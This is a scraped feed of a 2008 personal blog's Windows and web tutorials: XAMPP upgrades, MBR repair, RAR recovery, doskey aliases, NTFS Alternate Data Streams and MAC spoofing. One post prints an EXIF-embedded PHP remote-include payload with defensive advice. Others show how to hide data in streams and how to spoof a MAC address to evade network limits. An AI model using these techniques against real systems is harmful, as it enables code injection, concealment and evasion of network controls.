Symptoms:
Opening Windows Search, clicking "Search now" and the explorer process hangs / freezes.

Fix: (queue eyebrow-raising solution)
If you download ProcMon and filter for explorer.exe, you'll see it is trying to open the same file again and again. For me, this was a zip file containing icons for a web project I'm working on.

To make the search feature work again, rename the file it is getting stuck on and restart explorer. You should find everything is operational.

If anything is unclear and you think this problem might be affecting you, leave a comment and I'll have a look.

With just a few minor adjustments the Windows Command Prompt (cmd.exe) can emulate the behaviour of your favourite *nix shell. Please note, this isn't a full emulation method - the existing Windows commands are being manipulated to appear as their *nix shell counterparts.

Note: This is for systems where unauthorized software is not permitted. If you administrate your own system, I highly recommend checking the GnuWin32, in particular the CoreUtils package.

Background

This method involves simple implementation of the doskey macro utility. For convenience, a Windows batch file (*.bat) will be used to wrap calls to doskey. Some small adjustments to the registry are necessary, so it is strongly advised that the registry is backed up before reading further.

Create a Command List Batch File

1. Open a text editor of your choice (e.g. notepad).
2. The following are some examples of how to add a *nix command, with the Windows Command Prompt equivalent:
   @ECHO OFF
doskey sudo=runas /user:administrator $*
doskey alias=doskey $*
doskey ls=dir $*
doskey rm=del $*
doskey cp=copy $*
doskey mv=move $*
doskey clear=cls
doskey reboot=echo The system is going down for reboot NOW!$T shutdown -r
doskey restart=reboot
doskey top=tasklist
doskey traceroute=tracert $*
doskey kill=taskkill /F /IM $*
echo [%USERNAME%@%COMPUTERNAME%]$ *nix commands added

3. Save as a batch file somewhere on your system, e.g. C:\nix-cmd.bat

Please note: Not all commands will behave exactly like their counterpart, however these are some examples from my batch file.

Enabling Batch File and Tab-key Auto-complete

1. Start->Run->regedit
2. To add auto-complete for...
   ... just your username:
   HKEY_CURRENT_USER\Software\Microsoft\Command Processor
   ... all system users:
   HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
3. Modify the key entries to reflect your system settings, although they should appear somewhat similar to the below:
   
   

   *nix cmd registry screen capture

If you want to use a different key for auto-complete (i.e. not tab), then change the CompletionChar and PathCompletionChar values to the desired hexadecimal character code.

Footnote

That is all there is to it! I mostly make do with the commands above - its just a nice little tweak to make the command prompt a bit more usable.

My guide will describe how to upgrade the current XAMPP PHP version to the second release candidate of version 5.3. It is expected that this method will also work for the third release candidate when it is released later this month.

Step 1: Make backups

Before starting, make sure to backup any settings, custom modules and most importantly the htdocs directory, which contains your scripts and page resources. This directory is normally located at C:\xampp\htdocs\

Step 2: Preparation

1. Download PHP 5.3.0rc2. I use the VC6 build in order to minimise any potential compatibility issues.
2. It is also recommended that you download the latest Windows version of XAMPP. While this is an upgrade guide that should work with previous versions of XAMPP, it is recommended that a fresh copy of the core files is used.
3. Stop any instances of the Apache service that might be running.

Step 3: The upgrade

This guide will assume your XAMPP directory is C:\xampp\

1. Extract the XAMPP archive to a directory of your choosing, I would recommend using the default C:\xampp\
2. Extract the contents of the PHP archive to C:\xampp\php\, overwriting the contents of this directory with the new files.
3. Open the file C:\xampp\apache\conf\extra\httpd-xampp.conf and ensure the following lines are present in this order:

   LoadFile "/xampp/php/php5ts.dll"
   LoadModule php5_module "/xampp/apache/bin/php5apache2_2.dll"

4. Replace C:\xampp\php\php.ini with C:\xampp\php\php.ini-dist
   Uncomment the lines:

   ;extension=php_mbstring.dll
   ;extension=php_pdo_sqlite.dll

   Replace the line

   magic_quotes_gpc = On

   with

   magic_quotes_gpc = Off

5. Copy all files in the C:\xampp\php\ to C:\xampp\apache\bin\ (do not copy the subdirectories or their contents).

After following the above steps, restart your Apache service (this can be done using C:\xampp\xampp-control.exe or manually through the control panel/command prompt). Your PHPinfo should indicate that the upgrade has been successful.

I will update this post if I discover any problems from using this method, or a cleaner (automated) means of performing the upgrade.

Many Googl'd solutions involved rebooting with one repair/installation disk or another, however I've found a quicker way...

The Fix

1. Download MbrFix. [Working mirror at time of writing.]
2. Use mbrfix /drive <num> driveinfo to identify the USB flash drive. The <num> refers to the physical identifier. Start at zero and increment until one of them gives a size reading that matches; this is probably the correct drive.
3. Use mbrfix /drive <num> clean and enter "y" to confirm partition deletion. WARNING: IF YOU DO THIS, DATA RECOVERY FROM THE DRIVE IS DIFFICULT, BE SURE YOU HAVE CHOSEN THE CORRECT DRIVE!
4. Go to Control Panel->Administrative Tools->Disk Management and right-click on the unallocated space. Select create new partition and fill in the details.

This has reset the drive with a healthy partition, you should find it has regained functionality!

]]> http://plasmid.co.uk/2008/12/04/repairing-broken-usb-partition-tables/feed/ 0 http://plasmid.co.uk/2008/10/27/ubuntu-broke-my-mbr/ http://plasmid.co.uk/2008/10/27/ubuntu-broke-my-mbr/#comments Mon, 27 Oct 2008 19:24:40 +0000 plasmid http://plasmid.co.uk/?p=82 When installing Ubuntu on to a USB stick it will overwrite your system disk MBR. This is a significant problem for those with multi-boot or a Windows installation (as the system disk can no longer boot without putting in the USB stick each time!). The following is the account of my little adventure in to repairing my laptop disk MBR...


EDIT: At step 7 of the installation, click on the advanced settings and select the drive on which the boot manager should be installed. This has been verified using Ubuntu 8.10rc1. I don't remember seeing this in the menu of 8.04, maybe they should put something so important in a more prominent place (or I should at least look harder)!

The problem

In a nutshell (please forgive the amateur dramatisation):

• You make the reasonable assumption that: because you're installing Ubuntu to a USB stick and not the system partition, it will put GRUB on to the USB stick so you can boot it as a USB-HDD.
• Upon rebooting the system, you find that Ubuntu has OVERWRITTEN your system disk boot partition - uh oh! Inexplicably, Ubuntu still installs GRUB to the USB stick, even though it has modified the system MBR. Booting is now impossible without the USB stick plugged in! (oh dear, oh dear!)
• After furious searching, you can't find a working XP installation disk so try to use this little guide on downloading the recovery console to rebuild your MBR.
• Rebooting once again, you find the recovery console BSODs before you can even touch the fixmbr command.
• Getting desperate now, you Google again for anyone else who might have the same problem but find they're using Vista and this is inapplicable to your situation.
• You spend the next hour facepalming until your hand starts to bleed ...

The solution (hurrah!)

Fortunately, Google did come up trumps in the end. A little tool know as MbrFix can be run from within Windows to fix the problem and dispose of the broken GRUB once and for all!

If you don't fancy reading through the entire manual, here is my 3-step fix:

1. Download a copy of MbrFix.exe
2. Extract it anywhere on your hard disk.
3. Run the program (as admin) with these parameters:

   MbrFix /drive 0 fixmbr /yes

After restarting, your system should boot Windows as normal!

]]> http://plasmid.co.uk/2008/10/27/ubuntu-broke-my-mbr/feed/ 0 http://plasmid.co.uk/2008/10/04/partial-rar-extraction-using-winrar/ http://plasmid.co.uk/2008/10/04/partial-rar-extraction-using-winrar/#comments Sat, 04 Oct 2008 21:33:54 +0000 plasmid http://plasmid.co.uk/?p=45 WinRAR allows users to split file archives into smaller pieces (a feature present in most major archiving software these days). It is sometimes the case that one or more of these pieces are missing, and as such the archive cannot be completely reassembled. This tutorial shows how to partially recover files from a RAR that does not have all pieces present.

Introduction

This tutorial assumes you are running either Windows 2000/XP and have a copy of WinRAR installed (Download WinRAR: http://www.rarlab.com/download.htm). This tutorial works best for RAR files that contain video media.

There are a number of caveats associated with this method (e.g. extraction of text files or images is unlikely because the packaging software will have probably compressed it); please read the list before continuing. With this in mind, let's get started...

Background

Archive files that have been split are often suffixed .001, .r01 or simply .part01 (where the final digits represent which piece of the overall archive it is, i.e. a 5 part archive might have files with .001, .002, .003, .004 and .005 as suffixes). WinRAR extracts and assembles files in the Windows temporary folder, we will exploit this mechanism to extract files from archives where we do not have all of the pieces.

The method in the madness!

1. Double click one of the archive files (or open it manually from within WinRAR).
2. Tell the program to extract the file somewhere on your computer.
3. An error message will pop-up and inform you that not all pieces were present to complete the extraction.

   

   DO NOT CLOSE THIS WINDOW!!!

4. Navigate to the temporary directory for your username. The default on Windows XP is:
   C:\Documents and Settings\YOUR USERNAME\Local Settings\Temp.
5. This folder/directory is usually pretty full. Look for a directory called Rar$****.*** (where the *s represent any character). The naming convention might be different between versions, if you are having trouble finding this directory, try searching the temporary directory for file that you are trying to extract (CTRL+F and then the file name).
6. Once you've located the file, copy it to your desktop or another 'safe' directory (i.e. outside of your temporary folder).
7. The file you've extracted should be the combined contents of the archive pieces you have available at the time of extraction.

Caveats

There are several caveats to this method, please read these before trying the above or you might find yourself wasting a lot of time!

1. Text and image files are almost always compressed, the output will be completely useless without all the parts since WinRAR seems to perform the decompression step last!
This method cannot be used to extract password protected files if you do not know the password.
2. The data will only be extracted up to the last sequential piece, e.g. if you have pieces 1, 2, 3, 6 and 7 of a 10 piece archive - the extraction will halt after extracting from piece 3.
]]> http://plasmid.co.uk/2008/10/04/partial-rar-extraction-using-winrar/feed/ 0 http://plasmid.co.uk/2008/05/21/exif-and-php-exploitation-the-truth/ http://plasmid.co.uk/2008/05/21/exif-and-php-exploitation-the-truth/#comments Wed, 21 May 2008 20:52:17 +0000 plasmid http://plasmid.co.uk/?p=44 Introduction

After reading through a couple of tutorials describing the ease with which PHP can be included directly from the EXIF data within a JPEG image, I became suspicious. Surely my eyes deceive me? Is this a late April Fools'? My first point of call was Google - which provided me with a wealth of information on EXIF functions from within PHP, but very little regarding this particular vulnerability.

There was nothing for it... time to jump in and see what the fuss was about!

Theory

In fairness, this tutorial is more of a reminder about general file security and good PHP inclusion practices. The JPEG EXIF data example is particularly illuminating in both of these aspects.

Most modern cameras and image recording devices save embedded data within their photos; this often includes the camera model, the date and time of the photograph, author information, orientation etc. This is fantastic for Joe Public, who can come home after a night of drunken debauchery, sling the camera memory card in it's reader et Voila! - pictures recounting his sordid antics are arranged chronologically on his desktop for later viewing... GREAT!

However, it is by this very same mechanism that an unscrupulous individual could include malicious PHP in an otherwise secure website.

The core of the issue is simple - EXIF data is stored as plain text within JPEG files. This is problematic in scenarios where users are allowed to upload their own images. For example, if a forum page is engineered in such a way as to allow the arbitrary inclusion of a locally uploaded JPEG image, there is the opportunity for EXIF data spiking to take place.

Method

1. Open up a JPEG with an image editor that supports EXIF data modification (e.g. PSP or PS work just fine).
2. Find the option to view image information and select EXIF Information.
3. Paste the following into an editable field (e.g. 'Image Title'): <? include('http://target-site.com'); ?>.

This is a very simple example where remote inclusion can take place (server settings permitting). To use, all that is required is a page where you're able to include() the image itself using $_GET[] or otherwise. During the include process, the file is read as plain text and the PHP code is executed.

The same effects can be replicated by including a file that contains plain text PHP code (e.g. text files, Word Documents, etc).

Conclusion

As my original suspicions confirmed, EXIF data manipulation as an exploit is simply too good to be true. I concede that there is potential for misuse (especially on poorly coded sites and forums) as image uploads are an integral aspect of almost every modern website. However, the fault often lies with individual weak scripts that are very easy to fix. The cause of this problem is because there is a tendency for programmers to be satisfied with dangerous PHP code!

How to avoid this affecting you

Never, I repeat - NEVER use $_GET[] to retrieve a file path for inclusion. Use databases or (if absolutely necessary) internal variables to hold file paths and make inclusion by reference to these, not what you get from the users browser. Also make sure to rigorously test your scripts before deploying them and (if you're particularly paranoid) selectively fuzz them whenever you make changes! Take heed of this and you're flying ;-)

]]> http://plasmid.co.uk/2008/05/21/exif-and-php-exploitation-the-truth/feed/ 0 http://plasmid.co.uk/2008/04/08/hiding-information-using-ads/ http://plasmid.co.uk/2008/04/08/hiding-information-using-ads/#comments Tue, 08 Apr 2008 22:41:40 +0000 plasmid http://plasmid.co.uk/2008/04/08/hiding-information-using-ads/ Introduction

This tutorial will explore the potential for using 'Alternate Data Streams' (ADS) to store information on an NTFS partition. All of the steps detailed below can be accomplished directly from within Windows.

Theory

Files act as pointers to physical data on a storage medium; they are a convenience, a way of managing information on a computer as discrete units. It should be this fantastically simple - one pointer for one file - but it seems Microsoft had other ideas...
Macintosh computers use a different file system to Windows computers. It was decided that NTFS should be able to emulate some aspects of the Mac file system to improve file compatibility. As a result, it is possible to 'attach' data to a file in a way that is not visible to users (oh dear!).

Getting your hands dirty

1. Load up a command-prompt Window (Start->Run->'cmd').
2. Create a file to run this demonstration on. In the console type: echo Hello, World! > test.txt.
   (The file 'test.txt' now contains 16 bytes of information. This is the default data stream)
3. In the console, enter type test.txt to show the information in 'test.txt'.
4. Let's hide some data! In the console type echo I am hidden! > test.txt:hidden.txt. Notice the colon (:) - this is very important!
5. If you repeat step 3, you should only see 'Hello, World!' printed to the console. Check the properties of the file using Windows Explorer and you'll arrive at the same conclusion, the file still contains only 16 bytes. You could even enter in type test.txt:hidden.txt to try and see the text in 'hidden.txt', but it will return an error. Where is the hell has the information you just entered gone?
6. To reveal the contents of 'hidden.txt', type more < test.txt:hidden.txt in the console, et voila - the magically disappearing information has made a miraculous reappearance!
7. The file 'hidden.txt' is now linked with 'test.txt'. You could say that 'test.txt' is acting as a pointer to two data streams. Furthermore, if you copy 'test.txt' to another folder - 'hidden.txt' is copied with it!

Conclusion

The above is a basic demonstration of how ADS can be used to store hidden information. The article at governmentsecurity.org goes on to explore how an executable could be hidden within a file too. I've written a small batch file that attaches a user-defined message to itself (using ADS) and presents it using notepad. To remove the hidden file, you can either try the method suggested at gov.sec. or just delete the batch file itself!

Download files

ads_demo.rar - extract and run.

]]> http://plasmid.co.uk/2008/04/08/hiding-information-using-ads/feed/ 0 http://plasmid.co.uk/2008/03/26/write-console-text-to-a-file-windows-cmdexe/ http://plasmid.co.uk/2008/03/26/write-console-text-to-a-file-windows-cmdexe/#comments Wed, 26 Mar 2008 20:53:50 +0000 plasmid http://plasmid.co.uk/2008/03/26/write-console-text-to-a-file-windows-cmdexe/ Writing directly from the Windows command line to a file might not be something you need to do very often. The famous black and white console is better suited to serving system commands and file operations than being a stand-in for notepad. However, it is sometimes useful to have the option of writing multiple lines of text to a file directly from the trusty prompt.

Method One

This is suitable for creating/overwriting a file with multiple lines of text.

copy con SOME_FILE.txt
Type your text here
You can even have multiple lines!

When finished, press CTRL+Z to confirm your action (or CTRL+C to cancel) and ENTER.

If you want to append some text instead of overwriting it completely, follow as above but using:

copy SOME_FILE.txt + con

Method Two

Open up the command prompt and type:

echo SOME TEXT > SOME_FILE.txt

This method creates/overwrites SOME_FILE.txt with the text you entered before the >. It is only suitable for entering a single line of text into a file.

As with method one, it possible to append text using >> instead of > in the command.

]]> http://plasmid.co.uk/2008/03/26/write-console-text-to-a-file-windows-cmdexe/feed/ 1 http://plasmid.co.uk/2008/03/09/spoof-your-network-adapter-mac-address-under-windows/ http://plasmid.co.uk/2008/03/09/spoof-your-network-adapter-mac-address-under-windows/#comments Sun, 09 Mar 2008 00:40:02 +0000 plasmid http://plasmid.co.uk/2008/03/09/spoof-your-network-adapter-mac-address-under-windows/ Overriding (or spoofing) your NIC / network adapter MAC address can be immensely useful for a number of reasons when using your PC on a large network. In essence you're creating a new identity for your box and any limitations associated with your previous MAC will no longer affect you! This tutorial will introduce some of the currently existing programs that can automate MAC address spoofing for you, as well as the necessary registry modifications to perform the task manually.

I came across MadMACs some time ago and it has become an invaluable part of my portable network security. Recently I've been looking to see what else is out there and found Mac MakeUp which provides a number of advanced features (integration with Wireshark, IP networking options, etc.) and has a straightforward graphical interface.

Both programs have been tested thoroughly and work a treat, but if you feel the only way to do a job properly is to do it yourself, then here is the step by step to DIY MAC spoofage:

1. Click Start->Run and enter 'regedt32' (no ' marks) to start up the registry editor.
2. Find the key:
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
   and you should have a list of 4 digit subkeys (0000, 0001, 0002 etc.)
3. Leaving the registry editor window open, go to Start->Run and enter 'cmd /k net config rdr' (no ' marks).
4. The console should list your PC and network details. Right click the start of the text next to NetBT_tcpip (the bit that looks like: {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}) and right click->select 'Mark'. Drag over the whole text (as shown in the brackets previously) and then press CTRL+C to copy to the clipboard.
5. Go back to the registry editor and click on the first subkey (i.e. 0000).
6. Click menu Edit->Find (or press CTRL+F). Paste in the text from the console and click 'Find next'.
7. It should return a result very quickly (if not - you've done something wrong!).
8. Right click anywhere on the right hand side pane apart from on one of the listed items and choose 'New->String'. Give the value the name 'NetworkAddress' (case sensitive, no ' marks) then simply double click it and enter a new MAC address!
9. Reboot your machine and enjoy!

For more information, check this Wikipedia article on MAC addresses.

]]> http://plasmid.co.uk/2008/03/09/spoof-your-network-adapter-mac-address-under-windows/feed/ 0